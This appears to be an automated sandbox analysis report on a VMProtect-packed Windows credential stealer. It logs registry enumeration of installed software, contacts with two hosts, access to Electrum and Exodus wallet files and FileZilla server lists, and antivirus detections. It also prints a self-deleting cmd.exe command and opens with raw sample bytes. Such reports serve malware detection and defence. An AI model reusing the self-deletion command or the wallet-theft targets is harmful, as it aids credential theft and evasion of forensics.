:ŋL%÷Á(bu:Ô3˅ûÉø‰¡RÝy÷ÑùÁ;bøfýÁyñŽj¹{øf…ßf÷Åô;÷Ñf÷Å6‰wy;ùø3ÙùùéÀ+øÑÀ3Øfü£$øWÃf;ÅöÅÝú‹¶3ˁéu.1|é$é<õfÈf‰Nœøfºñ[¿üÿÿÿ‹3ËéyI1ùÇf;ó3ËùÑÁúì3Ž_f…ƍ‰õ;õ…á€ûô÷ÙõøÁÉf…́é3TõùÑÁ÷Ã8÷Dé:Nw!÷сéž%øÁÁù÷Ã<eT/÷ÙIöÂÑõ3Ùéé?é]ù(3Ëõ÷Ñf;æùÁšwcõû[Œh÷Ùùøé»õ5êéß<ò›ÎˆN¸H‡LEËxfôúÜxYàÂ¥Þa‰$÷è?ÿEMƒc¢\Fá×LÌ/T-¡ç€Ïü1$áÅÿÿÿÿýáKYÍ Àòfdà[Øîß¾;o :¥´ |”ÃþüÑy lIlÚTgÂǀəhÛ¢öÌÿÿÿúþ2?~¹@“{ÏS¨ÔNfÞy¬ã´ KOYÜõ{~¤!:‡9yÉxý՟.‡¿WÇ!‡ Éz8‡Ï—üwg7ËÛxe·›‡þ®úN‡tìÍxFŒ¸Úx!yëåxßF?‡[#ÆØx‰‰ž×x—·#Îx± D?š÷Dz÷Ær/)‡§õ
request_handle: 0x00cc003c
1 1 0
section {u'size_of_data': u'0x00414c00', u'virtual_address': u'0x00298000', u'entropy': 7.927531865525298, u'name': u'.vmp1', u'virtual_size': u'0x00414b10'} entropy 7.92753186553 description A section with a high entropy has been found
entropy 0.978573937478 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x000002bc
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExW

 regkey_r: AddressBook
base_handle: 0x000002bc
key_handle: 0x000002b4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

 regkey_r: Connection Manager
base_handle: 0x000002bc
key_handle: 0x000002b8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

 regkey_r: DirectDrawEx
base_handle: 0x000002bc
key_handle: 0x000002c0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

 regkey_r: EditPlus
base_handle: 0x000002bc
key_handle: 0x000002c4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

 regkey_r: ENTERPRISE
base_handle: 0x000002bc
key_handle: 0x000002c8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
1 0 0

RegOpenKeyExW

 regkey_r: Fontcore
base_handle: 0x000002bc
key_handle: 0x000002cc
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

 regkey_r: Google Chrome
base_handle: 0x000002bc
key_handle: 0x000002d0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

 regkey_r: Haansoft HWord 80 Korean
base_handle: 0x000002bc
key_handle: 0x000002d4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

 regkey_r: IE40
base_handle: 0x000002bc
key_handle: 0x000002d8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

 regkey_r: IE4Data
base_handle: 0x000002bc
key_handle: 0x000002dc
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExW

 regkey_r: IE5BAKEX
base_handle: 0x000002bc
key_handle: 0x000002e0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0

RegOpenKeyExW

 regkey_r: IEData
base_handle: 0x000002bc
key_handle: 0x000002e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData
1 0 0

RegOpenKeyExW

 regkey_r: MobileOptionPack
base_handle: 0x000002bc
key_handle: 0x000002e8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
1 0 0

RegOpenKeyExW

 regkey_r: SchedulingAgent
base_handle: 0x000002bc
key_handle: 0x000002ec
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
1 0 0

RegOpenKeyExW

 regkey_r: WIC
base_handle: 0x000002bc
key_handle: 0x000002f0
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC
1 0 0

RegOpenKeyExW

 regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
base_handle: 0x000002bc
key_handle: 0x000002f4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
1 0 0

RegOpenKeyExW

 regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980}
base_handle: 0x000002bc
key_handle: 0x000002f8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
1 0 0

RegOpenKeyExW

 regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
base_handle: 0x000002bc
key_handle: 0x000002fc
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-0015-0412-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x00000300
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-0016-0412-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x00000304
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-0018-0412-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x00000308
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-0019-0412-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x0000030c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-001A-0412-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x00000310
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-001B-0412-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x00000314
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-001F-0409-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x00000318
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-001F-0412-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x0000031c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-0028-0412-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x00000320
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-002C-0412-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x00000324
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-0030-0000-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x00000328
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-0044-0412-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x0000032c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-006E-0409-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-006E-0412-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x00000334
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-00A1-0412-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x00000338
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-00BA-0409-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x0000033c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90120000-0114-0412-0000-0000000FF1CE}
base_handle: 0x000002bc
key_handle: 0x00000340
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4}
base_handle: 0x000002bc
key_handle: 0x00000344
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}
1 0 0

RegOpenKeyExW

 regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40}
base_handle: 0x000002bc
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}
1 0 0

RegOpenKeyExW

 regkey_r: {d992c12e-cab2-426f-bde3-fb8c53950b0d}
base_handle: 0x000002bc
key_handle: 0x0000034c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}
1 0 0
Time & API Arguments Status Return Repeated

InternetOpenW

 proxy_name:
proxy_bypass:
flags: 0
user_agent: XyqYNP3LKVAxuRLmSk7Z
access_type: 0
1 13369372 0
cmdline chcp 65001
cmdline cmd.exe /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\test22\AppData\Local\Temp\cock.mp4"
cmdline "C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\test22\AppData\Local\Temp\cock.mp4"
cmdline ping 127.0.0.1
section .vmp0 description Section name indicates VMProtect
section .vmp1 description Section name indicates VMProtect
host 128.199.63.64
host 185.121.177.177
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
file C:\Users\test22\AppData\Roaming\Electrum\wallets
file C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
Time & API Arguments Status Return Repeated

RegQueryValueExW

 key_handle: 0x000002c4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002c8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002d0
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002d4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002f8
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002fc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000300
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Access MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000304
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Excel MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000308
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office PowerPoint MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000030c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Publisher MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000310
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Outlook MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000314
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Word MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000318
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000031c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000320
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office IME (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000324
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000328
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000032c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office InfoPath MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000330
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000334
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000338
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OneNote MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000033c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000340
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000344
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000348
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 NPAPI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000034c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0
process cock.mp4 useragent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
process cock.mp4 useragent XyqYNP3LKVAxuRLmSk7Z
file C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
file C:\Users\test22\AppData\Local\Temp\1.exe:Zone.Identifier
Lionic Trojan.Win32.Androm.m!c
Cylance Unsafe
K7GW Trojan ( 7000001c1 )
K7AntiVirus Trojan ( 7000001c1 )
BitDefenderTheta Gen:NN.ZexaE.34218.@F1@aydqv0hi
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Generik.JQZCPUD
APEX Malicious
Kaspersky Backdoor.Win32.Androm.uuli
Sophos Mal/VMProtBad-A
McAfee-GW-Edition Artemis!Trojan
FireEye Generic.mg.d050948cba26749c
SentinelOne Static AI - Suspicious PE
GData Win32.Trojan-Stealer.CredStealer.5F65S2
eGambit PE.Heur.InvalidSig
Kingsoft Win32.Hack.Androm.uu.(kcloud)
Gridinsoft Trojan.Win32.Sabsik.oa
Microsoft Trojan:Win32/Sabsik.FL.B!ml
Acronis suspicious
McAfee Artemis!D050948CBA26
Ikarus Win32.Outbreak
MaxSecure Trojan.Malware.300983.susgen
Fortinet W32/PossibleThreat
Webroot W32.Trojan.Gen